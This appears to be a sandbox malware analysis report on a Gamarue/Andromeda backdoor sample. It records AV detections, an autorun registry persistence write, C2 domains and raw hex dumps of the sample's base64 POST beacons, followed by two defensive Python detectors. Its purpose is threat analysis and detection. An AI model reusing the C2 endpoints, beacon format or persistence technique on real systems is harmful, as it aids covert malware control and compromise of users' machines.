Analysis Date: 2015-09-15 22:24:02
MD5: 3af74de9efe4ba7e784d1969ad457841
SHA1: 34ef329b4d5e29acad3457fbc6c4dac147b5f250

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 7ac2784970ab9d04202ac01bdfa69746 sha1: 2fedb5d47918a2eebad52cee6b96882465dfeab8 size: 8704
Section .rdata: md5: d50d3815004d38d2cdc0b0d88a71fbc5 sha1: caceb663f5063436117bcc34b8df563e620a47bb size: 512
Section .data: md5: 42910592ddb0f71f40abd178efd15d2c sha1: 4d19879529d21fc506c91764061509a8979fbfd8 size: 512
Section .rsrc: md5: 8ffb9f6486c4337cf6e6b79190fa1bce sha1: 268322e38da96f45b1ea2ea01887bf898c3e079b size: 83968
Timestamp: 2013-04-02 18:28:18
Version:
LegalCopyright: Copyright Mamuze© 2013
InternalName: Travka
FileVersion: 1, 3, 4, 7
CompanyName: House
PrivateBuild: Rainbow
LegalTrademarks: Fioka©"
Comments: Praslin
ProductName: Sunce
SpecialBuild: Kotlina
ProductVersion: 3, 0, 0, 0
FileDescription: Marko
OriginalFilename: Voda.exe
Packer: Borland Delphi 3.0 (???)
PEhash: 6a0b9c9f0710faa5b346685ad21974942db97fc1
IMPhash: ed48b82f1a1eb22a69de1e774d2f8905
AV Rising: no_virus
AV CA (E-Trust Ino): Win32/Gamarue.LE
AV F-Secure: Gen:Variant.Kazy.160852
AV Dr. Web: BackDoor.Andromeda.22
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Kazy.160852
AV BullGuard: Gen:Variant.Kazy.160852
AV Padvish: Worm.Win32.Gamarue.I1
AV VirusBlokAda (vba32): BScope.Trojan.MSA.5417
AV CAT (quickheal): Worm.Gamarue.B
AV Trend Micro: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: Downloader.Andromeda.Win32.2733
AV Emsisoft: Gen:Variant.Kazy.160852
AV Ikarus: Worm.Win32.Gamarue
AV Frisk (f-prot): W32/Trojan2.OCMB
AV Authentium: W32/Trojan.FKAQ-2289
AV MalwareBytes: Trojan.Bot.RV
AV MicroWorld (escan): Gen:Variant.Kazy.160852
AV Microsoft Security Essentials: VirTool:Win32/Obfuscator.AGA
AV K7: Trojan-Downloader ( 0039179f1 )
AV BitDefender: Gen:Variant.Kazy.160852
AV Fortinet: W32/Injector.AFHI!tr
AV Symantec: Trojan.Gen
AV Grisoft (avg): SHeur4.BFHZ
AV Eset (nod32): Win32/TrojanDownloader.Wauchos.A
AV Alwil (avast): FoldRun-F [Trj]
AV Ad-Aware: Gen:Variant.Kazy.160852
AV Twister: Trojan.C9D300786EA41CFE
AV Avira (antivir): TR/Dldr.Andromeda.tze
AV Mcafee: PWS-FAVD!3AF74DE9EFE4

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msoanr.cmd\\x00
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\All Users\Local Settings\Temp\msoanr.cmd
Deletes File: C:\34EF32~1.EXE
Creates Mutex: 3227095050
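
The registry write above is a compact persistence signature: an all-digit value name (36874) under HKLM\...\Policies\Explorer\Run, pointing at a .cmd staged in a Temp directory, and written by the wuauclt.exe instance that the process list shows the sample spawning rather than by an installer. The following is an added example, not part of this report: a scoring function over Sysmon-style registry-value-set events (Event ID 13 field names Image, TargetObject, Details). The first sample event reproduces the report's write; the other two are constructed for contrast. The autorun key list, the indicator set and the verdict thresholds are my own choices.

```python
"""Autorun persistence check over Sysmon-style registry events (Event ID 13:
Image, TargetObject, Details), keyed on the Policies\\Explorer\\Run write above."""

# Keys whose values Windows executes at logon, hive stripped and lower-cased so
# HKLM and HKCU writes are both caught. Policies\Explorer\Run is the one used here.
AUTORUN_KEYS = {
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
    "software\\microsoft\\windows\\currentversion\\policies\\explorer\\run",
}
HIVE_PREFIXES = ("hkey_local_machine\\", "hkey_current_user\\", "hklm\\", "hkcu\\")
TEMP_MARKERS = ("\\local settings\\temp\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
SCRIPT_EXTS = (".cmd", ".bat", ".vbs", ".js", ".scr", ".pif")


def split_target(target_object):
    """Return (key, value_name), lower-cased, with the hive prefix removed."""
    target = target_object.strip().lower()
    for prefix in HIVE_PREFIXES:
        if target.startswith(prefix):
            target = target[len(prefix):]
            break
    key, _, value_name = target.rpartition("\\")
    return key, value_name


def assess_registry_event(event):
    """Score one value-set event; returns the individual indicators and a verdict."""
    key, value_name = split_target(event["TargetObject"])
    # Sandboxes often log the trailing NUL of REG_SZ data (the \x00 in the report);
    # surrounding quotes are stripped so a quoted path still matches on its extension.
    details = event.get("Details", "").rstrip("\x00").strip().strip('"').lower()
    writer = event.get("Image", "").lower()

    indicators = {
        "autorun_location": key in AUTORUN_KEYS,
        "payload_in_temp": any(marker in details for marker in TEMP_MARKERS),
        # A script as an autorun target is rarer than an .exe and worth a point on its own.
        "payload_is_script": details.endswith(SCRIPT_EXTS),
        # Installers name their values; an all-digit name (36874 here) is a generated one.
        "numeric_value_name": value_name.isdigit(),
        # OS binaries under system32 do not normally set autorun values; in this run the
        # writer is wuauclt.exe, which the process list shows being spawned by the sample.
        "writer_in_system32": "\\windows\\system32\\" in writer,
    }
    if not indicators["autorun_location"]:
        return {"indicators": indicators, "verdict": "none"}
    hits = sum(1 for name, hit in indicators.items() if hit and name != "autorun_location")
    verdict = "high" if hits >= 2 else ("medium" if hits == 1 else "low")
    return {"indicators": indicators, "verdict": verdict}


# The first event reproduces the registry write from this report; the other two are
# constructed for contrast (a named installer value, and a non-autorun service setting).
SAMPLE_EVENTS = [
    {"Image": "C:\\WINDOWS\\system32\\wuauclt.exe",
     "TargetObject": "HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\Policies\\Explorer\\Run\\36874",
     "Details": "C:\\Documents and Settings\\All Users\\Local Settings\\Temp\\msoanr.cmd\x00"},
    {"Image": "C:\\Program Files\\ExampleVendor\\setup.exe",
     "TargetObject": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ExampleUpdater",
     "Details": "\"C:\\Program Files\\ExampleVendor\\updater.exe\""},
    {"Image": "C:\\WINDOWS\\system32\\svchost.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\Parameters\\NtpServer",
     "Details": "time.windows.com,0x9"},
]


def triage(events=SAMPLE_EVENTS):
    """Return the verdict for each event, in order."""
    return [assess_registry_event(e)["verdict"] for e in events]


if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, triage()):
        print(f"{verdict:6} {event['Image']} -> {event['TargetObject']}")
```

The Policies\Explorer\Run key is checked on equal footing with the usual Run and RunOnce keys because it is consulted at logon just as they are but is absent from many autorun baselines; the writer-image indicator is what separates this run from an installer doing the same write.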

Network Details:

DNS: www.update.microsoft.com.nsatc.net
Type: A
191.232.80.55
DNS: www.update.microsoft.com.nsatc.net
Type: A
65.55.50.189
DNS: xdqzpbcgrvkj.ru
Type: A
195.22.26.252
DNS: xdqzpbcgrvkj.ru
Type: A
195.22.26.253
DNS: xdqzpbcgrvkj.ru
Type: A
195.22.26.254
DNS: xdqzpbcgrvkj.ru
Type: A
195.22.26.231
DNS: anam0rph.su
Type: A
195.22.26.252
DNS: anam0rph.su
Type: A
195.22.26.253
DNS: anam0rph.su
Type: A
195.22.26.254
DNS: anam0rph.su
Type: A
195.22.26.231
DNS: www.update.microsoft.com
Type: A
DNS: orzdwjtvmein.in
Type: A
HTTP POST: http://xdqzpbcgrvkj.ru/in.php
User-Agent: Mozilla/4.0
HTTP POST: http://anam0rph.su/in.php
User-Agent: Mozilla/4.0
Flows TCP: 192.168.1.1:1031 ➝ 191.232.80.55:80
Flows UDP: 192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1033 ➝ 195.22.26.252:80
Flows UDP: 192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1035 ➝ 195.22.26.252:80
Flows UDP: 192.168.1.1:1036 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 444c7730 67396d59   ftZ33NB0DLw0g9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 444c7730 67396d59 3371773d   3NB0DLw0g9mY3qw=
0x000000f0 (00240)   3d71773d 3d                           =qw==
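
The two requests in the dump above, rebuilt and checked, as an added example that is not part of the report: the dump text is copied from the report, while the parser, the Content-Length check and the beacon heuristic are mine. Both POSTs declare Content-Length: 84 and carry the same 84-character base64 body, which decodes to 61 bytes that the report does not interpret, so the example stops at the encoding layer. The second dump runs four bytes (qw==) past the declared length, the same four bytes that end the first request's body; that is consistent with a stale capture buffer rather than data the sample sent, though the report does not say, and it is why the parser slices the body at Content-Length instead of taking everything after the headers.

```python
"""Rebuild the two POST requests from the report's hex dump, cut the body at
Content-Length and decode the base64 payload (which remains opaque here)."""
import base64
import re

# Dump text as printed in the report (hex offset, decimal offset, hex, ASCII column).
DUMP_XDQZPBCGRVKJ = """0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 444c7730 67396d59   ftZ33NB0DLw0g9mY
0x000000f0 (00240)   3371773d 3d                           3qw=="""

DUMP_ANAM0RPH = """0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 444c7730 67396d59 3371773d   3NB0DLw0g9mY3qw=
0x000000f0 (00240)   3d71773d 3d                           =qw=="""

# The hex field ends at the run of three or more spaces before the ASCII column.
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]+)\s+\(\d+\)\s+(.*?)\s{3,}")

def hexdump_to_bytes(dump):
    """Parse one dump into bytes, checking each line's offset against the bytes read so far."""
    out = bytearray()
    for line in dump.strip().splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            raise ValueError(f"unparseable dump line: {line!r}")
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"offset {m.group(1)} disagrees with {len(out)} bytes read")
        out += bytes.fromhex("".join(m.group(2).split()))
    return bytes(out)

def parse_http_request(raw):
    """Split a raw HTTP/1.1 request; the body is cut at Content-Length, the rest kept aside."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    request_line, *header_lines = head.decode("ascii").split("\r\n")
    method, path, version = request_line.split(" ")
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = int(headers.get("content-length", len(body)))
    return {"method": method, "path": path, "version": version, "headers": headers,
            "body": body[:declared], "trailing": body[declared:]}

BASE64_BLOB = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")

def is_in_php_beacon(req):
    """Shape seen in this run: POST /in.php, User-Agent 'Mozilla/4.0', a form-urlencoded
    Content-Type, yet a body that is one base64 blob rather than key=value pairs."""
    h = req["headers"]
    return (req["method"] == "POST" and req["path"] == "/in.php"
            and h.get("user-agent") == "Mozilla/4.0"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and BASE64_BLOB.match(req["body"]) is not None)

def analyse(dump):
    """Host, length bookkeeping, beacon flag and the decoded payload for one dump."""
    req = parse_http_request(hexdump_to_bytes(dump))
    return {"host": req["headers"].get("host"),
            "declared_length": int(req["headers"]["content-length"]),
            "body_length": len(req["body"]), "trailing": req["trailing"],
            "beacon": is_in_php_beacon(req),
            "payload": base64.b64decode(req["body"], validate=True)}

if __name__ == "__main__":
    for dump in (DUMP_XDQZPBCGRVKJ, DUMP_ANAM0RPH):
        r = analyse(dump)
        print(f"{r['host']}: beacon={r['beacon']} payload={len(r['payload'])}B trailing={r['trailing']!r}")
```

The beacon heuristic is derived only from what this run shows (path, User-Agent, a form-urlencoded Content-Type carrying no form fields); it is a triage filter for a proxy log or pcap, not a family signature. The offset check in hexdump_to_bytes is what would have caught a dump with a line dropped or duplicated, and base64.b64decode with validate=True rejects a body that is not clean base64 instead of silently skipping characters.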


Strings